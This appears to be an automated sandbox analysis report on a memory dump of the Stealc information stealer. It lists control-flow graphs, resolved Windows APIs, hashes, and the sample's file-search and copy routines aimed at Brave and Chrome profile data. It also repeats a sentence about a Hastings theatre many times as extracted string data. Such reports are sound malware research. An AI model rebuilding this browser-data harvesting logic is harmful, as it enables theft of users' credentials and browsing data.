                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774678
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774734
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077471E
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774765
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077462D
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077474F
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774643
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746B7
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745F3
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774617
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774662
                                                                                                                                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077475A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                                                                                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                                                                                                            • API String ID: 2127927946-2218711628
                                                                                                                                                                            • Opcode ID: deed3da76807859efddd279fc9be2f509bf3d17107b72aa5a1ef4d370eedd05f
                                                                                                                                                                            • Instruction ID: 944d54d5a243d65659af9eecf82f99b18fdf242cd9a00d736f9afbd62f679bbf
                                                                                                                                                                            • Opcode Fuzzy Hash: deed3da76807859efddd279fc9be2f509bf3d17107b72aa5a1ef4d370eedd05f
                                                                                                                                                                            • Instruction Fuzzy Hash: EB41B8B16C0614FBCB19ABE4EC8DA5C7B71AB48706B70C841F606991A0DBFC95119B3E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 960 789860-789874 call 789750 963 78987a-789a8e call 789780 GetProcAddress * 21 960->963 964 789a93-789af2 LoadLibraryA * 5 960->964 963->964 966 789b0d-789b14 964->966 967 789af4-789b08 GetProcAddress 964->967 969 789b46-789b4d 966->969 970 789b16-789b41 GetProcAddress * 2 966->970 967->966 971 789b68-789b6f 969->971 972 789b4f-789b63 GetProcAddress 969->972 970->969 973 789b89-789b90 971->973 974 789b71-789b84 GetProcAddress 971->974 972->971 975 789bc1-789bc2 973->975 976 789b92-789bbc GetProcAddress * 2 973->976 974->973 976->975
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1BA0), ref: 007898A1
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1CA8), ref: 007898BA
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1BD0), ref: 007898D2
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1C60), ref: 007898EA
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1D38), ref: 00789903
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1600), ref: 0078991B
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CEACC8), ref: 00789933
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CEAF08), ref: 0078994C
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1BE8), ref: 00789964
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1C30), ref: 0078997C
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1CC0), ref: 00789995
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1A80), ref: 007899AD
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CEAE68), ref: 007899C5
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1CF0), ref: 007899DE
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1D50), ref: 007899F6
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CEAF68), ref: 00789A0E
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1D68), ref: 00789A27
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1AF8), ref: 00789A3F
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CEB068), ref: 00789A57
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF1DE0), ref: 00789A70
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CEADA8), ref: 00789A88
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CF1DC8,?,00786A00), ref: 00789A9A
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CF1DB0,?,00786A00), ref: 00789AAB
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CF1DF8,?,00786A00), ref: 00789ABD
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CF1E10,?,00786A00), ref: 00789ACF
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CF1E28,?,00786A00), ref: 00789AE0
                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00CF1E40), ref: 00789B02
                                                                                                                                                                            • GetProcAddress.KERNEL32(77040000,00CF1D80), ref: 00789B23
                                                                                                                                                                            • GetProcAddress.KERNEL32(77040000,00CF1D98), ref: 00789B3B
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CF2140), ref: 00789B5D
                                                                                                                                                                            • GetProcAddress.KERNEL32(75690000,00CEAFA8), ref: 00789B7E
                                                                                                                                                                            • GetProcAddress.KERNEL32(776F0000,00CF1610), ref: 00789B9F
                                                                                                                                                                            • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00789BB6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                            • String ID: F(t$NtQueryInformationProcess
                                                                                                                                                                            • API String ID: 2238633743-4113152680
                                                                                                                                                                            • Opcode ID: 9c8391c2b6b1dd2076ab501354be0556cb27703cd19610f2e8177189524374ac
                                                                                                                                                                            • Instruction ID: 4ee30177c566c9985eafb776c1c552783b58f6f10126482fb125cf9b30858d31
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c8391c2b6b1dd2076ab501354be0556cb27703cd19610f2e8177189524374ac
                                                                                                                                                                            • Instruction Fuzzy Hash: 72A17CB593C240AFC344EFA8EFC89663BF9F74C321754471AE605C3624DA3A9841EB12

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1814 77be70-77bf02 call 78a740 call 78a920 call 78a9b0 call 78a8a0 call 78a800 * 2 call 78a740 * 2 call 78aad0 FindFirstFileA 1833 77bf04-77bf3c call 78a800 * 6 call 771550 1814->1833 1834 77bf41-77bf55 StrCmpCA 1814->1834 1878 77c80f-77c812 1833->1878 1836 77bf57-77bf6b StrCmpCA 1834->1836 1837 77bf6d 1834->1837 1836->1837 1838 77bf72-77bfeb call 78a820 call 78a920 call 78a9b0 * 2 call 78a8a0 call 78a800 * 3 1836->1838 1840 77c7b4-77c7c7 FindNextFileA 1837->1840 1884 77bff1-77c077 call 78a9b0 * 4 call 78a8a0 call 78a800 * 4 1838->1884 1885 77c07c-77c0fd call 78a9b0 * 4 call 78a8a0 call 78a800 * 4 1838->1885 1840->1834 1843 77c7cd-77c7da FindClose call 78a800 1840->1843 1849 77c7df-77c80a call 78a800 * 5 call 771550 1843->1849 1849->1878 1921 77c102-77c118 call 78aad0 StrCmpCA 1884->1921 1885->1921 1924 77c2df-77c2f5 StrCmpCA 1921->1924 1925 77c11e-77c132 StrCmpCA 1921->1925 1926 77c2f7-77c33a call 771590 call 78a7a0 * 3 call 77a260 1924->1926 1927 77c34a-77c360 StrCmpCA 1924->1927 1925->1924 1928 77c138-77c252 call 78a740 call 788b60 call 78a9b0 call 78a920 call 78a8a0 call 78a800 * 3 call 78aad0 * 2 CopyFileA call 78a740 call 78a9b0 * 2 call 78a8a0 call 78a800 * 2 call 78a7a0 call 7799c0 1925->1928 1988 77c33f-77c345 1926->1988 1929 77c3d5-77c3ed call 78a7a0 call 788d90 1927->1929 1930 77c362-77c379 call 78aad0 StrCmpCA 1927->1930 2080 77c254-77c29c call 78a7a0 call 771590 call 785190 call 78a800 1928->2080 2081 77c2a1-77c2da call 78aad0 DeleteFileA call 78aa40 call 78aad0 call 78a800 * 2 1928->2081 1953 77c4c6-77c4db StrCmpCA 1929->1953 1954 77c3f3-77c3fa 1929->1954 1942 77c3d0 1930->1942 1943 77c37b-77c3ca call 771590 call 78a7a0 * 3 call 77a790 1930->1943 1946 77c73a-77c743 1942->1946 1943->1942 1955 77c745-77c799 call 771590 call 78a7a0 * 2 call 78a740 call 77be70 1946->1955 1956 77c7a4-77c7af call 78aa40 * 2 1946->1956 1958 77c4e1-77c64a call 78a740 call 78a9b0 call 78a8a0 call 78a800 call 788b60 call 78a920 call 78a8a0 call 78a800 * 2 call 78aad0 * 2 CopyFileA call 771590 call 78a7a0 * 3 call 77aef0 call 771590 call 78a7a0 * 3 call 77b4f0 call 78aad0 StrCmpCA 1953->1958 1959 77c6ce-77c6e3 StrCmpCA 1953->1959 1961 77c3fc-77c403 1954->1961 1962 77c469-77c4b6 call 771590 call 78a7a0 call 78a740 call 78a7a0 call 77a790 1954->1962 2030 77c79e 1955->2030 1956->1840 2113 77c6a4-77c6bc call 78aad0 DeleteFileA call 78aa40 1958->2113 2114 77c64c-77c699 call 771590 call 78a7a0 * 3 call 77ba80 1958->2114 1959->1946 1967 77c6e5-77c72f call 771590 call 78a7a0 * 3 call 77b230 1959->1967 1972 77c467 1961->1972 1973 77c405-77c461 call 771590 call 78a7a0 call 78a740 call 78a7a0 call 77a790 1961->1973 2039 77c4bb 1962->2039 2042 77c734 1967->2042 1980 77c4c1 1972->1980 1973->1972 1980->1946 1988->1946 2030->1956 2039->1980 2042->1946 2080->2081 2081->1924 2122 77c6c1-77c6cc call 78a800 2113->2122 2130 77c69e 2114->2130 2122->1946 2130->2113
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00790B32,00790B2B,00000000,?,?,?,007913F4,00790B2A), ref: 0077BEF5
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007913F8), ref: 0077BF4D
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,007913FC), ref: 0077BF63
                                                                                                                                                                            • FindNextFileA.KERNELBASE(000000FF,?), ref: 0077C7BF
                                                                                                                                                                            • FindClose.KERNEL32(000000FF), ref: 0077C7D1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                            • API String ID: 3334442632-726946144
                                                                                                                                                                            • Opcode ID: 1eab48dedfdc161aee4742db6c37aef47c3c1df87e20afd19f10a01bcc414756
                                                                                                                                                                            • Instruction ID: 36f5e8c28fc05a4dd5dfe0774c8deb26c92ce32062e16b717e585cc8bcfa9e34
                                                                                                                                                                            • Opcode Fuzzy Hash: 1eab48dedfdc161aee4742db6c37aef47c3c1df87e20afd19f10a01bcc414756
                                                                                                                                                                            • Instruction Fuzzy Hash: 80425372950104EBDF14FB70DD9AEED737DAB94300F408569F50A96091EE3CAB49CBA2

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • wsprintfA.USER32 ref: 0078492C
                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00784943
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
                                                                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
                                                                                                                                                                            • FindClose.KERNEL32(000000FF), ref: 00784B92
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
